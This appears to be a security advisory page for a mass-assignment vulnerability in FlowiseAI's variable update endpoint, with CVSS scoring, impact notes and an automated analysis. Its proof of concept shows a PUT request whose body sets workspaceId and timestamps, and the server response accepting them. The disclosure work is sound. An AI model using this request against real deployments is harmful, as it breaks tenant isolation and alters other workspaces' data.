Severity by source
CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from Vendor (https://github.com/FlowiseAI/Flowise) · only source for this CVE.
CVSS VectorVendor: https://github.com/FlowiseAI/Flowise
CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
9DescriptionCVE.org
Summary
A Mass Assignment vulnerability exists in the variable update endpoint of FlowiseAI.
The endpoint allows authenticated users to modify server-controlled properties such as workspaceId, createdDate, and updatedDate when updating a variable resource.
Due to missing server-side validation and authorization checks, an attacker can manipulate the workspaceId field and reassign variables to arbitrary workspaces.
This behavior may break tenant isolation in multi-workspace environments.
Details
The endpoint responsible for updating variables:
PUT /api/v1/variables/{variableId}
accepts a JSON request body containing the variable definition.
However, the backend does not restrict which attributes can be modified by the client. As a result, user-controlled request bodies can include internal properties that should normally be controlled exclusively by the server.
Server-controlled fields that can be manipulated include:
- workspaceId
- createdDate
- updatedDate
These fields appear to be directly mapped to the database entity without strict input validation or authorization checks.
For example, the following request body was accepted by the server:
{
"name": "aaa",
"value": "bbbe",
"type": "static",
"createdDate": "2016-03-06T17:59:30.000Z",
"updatedDate": "2016-03-06T18:00:17.000Z",
"workspaceId": "11111111-2222-3333-4444-555555555555"
}The server accepted the attacker-controlled workspaceId and metadata fields and persisted them.
PoC
Request
PUT /api/v1/variables/<VARIABLE_ID>
Content-Type: application/json
{
"name": "aaa",
"value": "bbbe",
"type": "static",
"createdDate": "2016-03-06T17:59:30.000Z",
"updatedDate": "2016-03-06T18:00:17.000Z",
"workspaceId": "11111111-2222-3333-4444-555555555555"
}Response
{
"id": "0a2b9f61-4a97-4ff8-b80d-00275ed18674",
"name": "aaa",
"value": "bbbe",
"type": "static",
"createdDate": "2016-03-06T17:59:30.000Z",
"updatedDate": "2026-03-06T18:05:17.000Z",
"workspaceId": "11111111-2222-3333-4444-555555555555"
}This confirms that the backend accepts and persists attacker-controlled internal properties.
Impact
This vulnerability allows authenticated users to manipulate internal attributes of variable resources.
Possible impacts include:
- Cross-workspace reassignment of variables (workspaceId)
- Unauthorized modification of metadata (createdDate, updatedDate)
- Potential tenant isolation bypass in multi-workspace deployments
In multi-tenant environments, this may allow an attacker to move variables between workspaces without authorization.
AnalysisAI
Mass assignment in FlowiseAI Flowise allows authenticated low-privilege users to modify server-controlled properties on the PUT /api/v1/variables/{variableId} endpoint, including workspaceId, createdDate, and updatedDate. By reassigning a variable's workspaceId to an arbitrary value, an attacker can break tenant isolation in multi-workspace deployments and move variables across tenant boundaries. Publicly available exploit code exists in the GHSA-6fw7-3q8r-m5vj advisory, but no public exploit identified at time of analysis as widespread weaponization, and the issue is not listed in CISA KEV.
Same weakness CWE-284 – Improper Access Control
View allSame technique Authentication Bypass
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-35103
GHSA-6fw7-3q8r-m5vj